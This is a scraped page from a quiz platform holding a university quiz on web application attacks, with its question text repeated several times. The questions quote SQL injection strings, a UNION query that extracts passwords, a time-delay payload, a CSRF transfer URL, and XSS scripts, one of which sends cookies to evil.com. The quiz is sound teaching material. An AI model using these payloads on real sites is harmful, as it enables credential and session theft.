Web Application Attacks

Quiz

•

Information Technology (IT)

•

University

•

Practice Problem

•

Hard

Beulah Christudas

Used 1+ times

FREE Resource

10 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A user enters ' OR 1=1-- in a login form, but no error is shown. Instead, the page behaves differently when true or false conditions are injected. There’s no visible database error message, but the attacker observes the application's response changing depending on the input. What type of
SQLi attack is this?

Time-based Blind SQLi

Boolean-based Blind SQLi

Retrieving Hidden Data

Subverting Application logic

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

An attacker submits the following input:
' UNION SELECT username, password FROM users--
This causes the application to display usernames and passwords from a different table.
What type of attack is this?

Blind SQLi

Union-based SQLi

Error-based SQLi

Boolean-based SQLi

3.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

An attacker sends the input:
1' OR IF(1=1, SLEEP(5), 0)--
The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.
What type of SQLi attack is this?

Retrieving Hidden Data

Boolean-based Blind SQLi

Subverting Application logic

Time-based Blind SQLi

4.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.
What type of attack is this?

Cross-site Scripting

Cross-site Request Forgery

SQL Injection

Session Hijacking

5.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A user comments on a blog post by entering the following code:
<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>
Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.
What type of attack is this?

Reflected XSS

Stored XSS

DOM-Based XSS

Blind SQLi

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A search form on an e-commerce website allows users to search for products. The intended query is:
SELECT * FROM products WHERE category = 'electronics' AND released = 1;
An attacker modifies the URL to: https://example.com/products?category=electronics'--
What is the effect of this attack?

Subverting application logic

Retrieving hidden data

Time delay

Detailed error

7.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

What type of SQL Injection manipulates application logic to change how a query behaves?

Subverting application logic SQLi

Retrieving Hidden Data SQLi

Blind SQLi

Union based SQLi

Access all questions and much more by creating a free account

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

15 questions

KMA ESP: Unit 2

Quiz

•

University

6 questions

22 CEH M2 Footprinting and Reconnaissance

Quiz

•

University

15 questions

Ulangan Harian 1

Quiz

•

9th Grade - University

10 questions

Basics of Network and Internet Safety

Quiz

•

10th Grade - University

15 questions

Database Security (GROUP 3)

Quiz

•

University

14 questions

Vulnerabilidades en Aplicaciones Web

Quiz

•

University

Popular Resources on Wayground

15 questions

Fractions on a Number Line

Quiz

•

3rd Grade

20 questions

Equivalent Fractions

Quiz

•

3rd Grade

25 questions

Multiplication Facts

Quiz

•

5th Grade

$fractions$

22 questions

fractions

Quiz

•

3rd Grade

20 questions

Main Idea and Details

Quiz

•

5th Grade

20 questions

Context Clues

Quiz

•

6th Grade

15 questions

Equivalent Fractions

Quiz

•

4th Grade

20 questions

Figurative Language Review

Quiz

•

6th Grade

Discover more resources for Information Technology (IT)

12 questions

IREAD Week 4 - Review

Quiz

•

3rd Grade - University

23 questions

Subject Verb Agreement

Quiz

•

9th Grade - University

7 questions

Force and Motion

Interactive video

•

4th Grade - University

7 questions

Renewable and Nonrenewable Resources

Interactive video

•

4th Grade - University

5 questions

Poetry Interpretation

Interactive video

•

4th Grade - University

19 questions

Black History Month Trivia

Quiz

•

6th Grade - Professio...

15 questions

Review1

Quiz

•

University

15 questions

Pre1

Quiz

•

University

Web Application Attacks

10 questions

An attacker submits the following input:
' UNION SELECT username, password FROM users--
This causes the application to display usernames and passwords from a different table.
What type of attack is this?

An attacker sends the input:
1' OR IF(1=1, SLEEP(5), 0)--
The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.
What type of SQLi attack is this?

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.
What type of attack is this?

A user comments on a blog post by entering the following code:
<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>
Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.
What type of attack is this?

A search form on an e-commerce website allows users to search for products. The intended query is:
SELECT * FROM products WHERE category = 'electronics' AND released = 1;
An attacker modifies the URL to: https://example.com/products?category=electronics'--
What is the effect of this attack?

What type of SQL Injection manipulates application logic to change how a query behaves?

Which SQLi attack enables the attacker to fetch data from multiple tables?

Which type of SQLi attack does not send the response to the attacker?

An attacker crafts the following malicious URL and sends it to a victim:
https://vulnerable.com/search?q=<script>alert('Hacked')</script>
When the victim clicks the link, the site immediately pops an alert box using the injected script.
What type of attack is this?

Access all questions and much more by creating a free account

Similar Resources on Wayground

Popular Resources on Wayground

Discover more resources for Information Technology (IT)

Web Application Attacks

10 questions

An attacker submits the following input:' UNION SELECT username, password FROM users--This causes the application to display usernames and passwords from a different table.What type of attack is this?

An attacker sends the input:1' OR IF(1=1, SLEEP(5), 0)--The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.What type of SQLi attack is this?

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.What type of attack is this?

A user comments on a blog post by entering the following code:<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.What type of attack is this?

A search form on an e-commerce website allows users to search for products. The intended query is:SELECT * FROM products WHERE category = 'electronics' AND released = 1;An attacker modifies the URL to: https://example.com/products?category=electronics'-- What is the effect of this attack?

What type of SQL Injection manipulates application logic to change how a query behaves?

Which SQLi attack enables the attacker to fetch data from multiple tables?

Which type of SQLi attack does not send the response to the attacker?

An attacker crafts the following malicious URL and sends it to a victim:https://vulnerable.com/search?q=<script>alert('Hacked')</script>When the victim clicks the link, the site immediately pops an alert box using the injected script.What type of attack is this?

Access all questions and much more by creating a free account

Similar Resources on Wayground

Popular Resources on Wayground

Discover more resources for Information Technology (IT)

An attacker submits the following input:
' UNION SELECT username, password FROM users--
This causes the application to display usernames and passwords from a different table.
What type of attack is this?

An attacker sends the input:
1' OR IF(1=1, SLEEP(5), 0)--
The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.
What type of SQLi attack is this?

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.
What type of attack is this?

A user comments on a blog post by entering the following code:
<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>
Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.
What type of attack is this?

A search form on an e-commerce website allows users to search for products. The intended query is:
SELECT * FROM products WHERE category = 'electronics' AND released = 1;
An attacker modifies the URL to: https://example.com/products?category=electronics'--
What is the effect of this attack?

An attacker crafts the following malicious URL and sends it to a victim:
https://vulnerable.com/search?q=<script>alert('Hacked')</script>
When the victim clicks the link, the site immediately pops an alert box using the injected script.
What type of attack is this?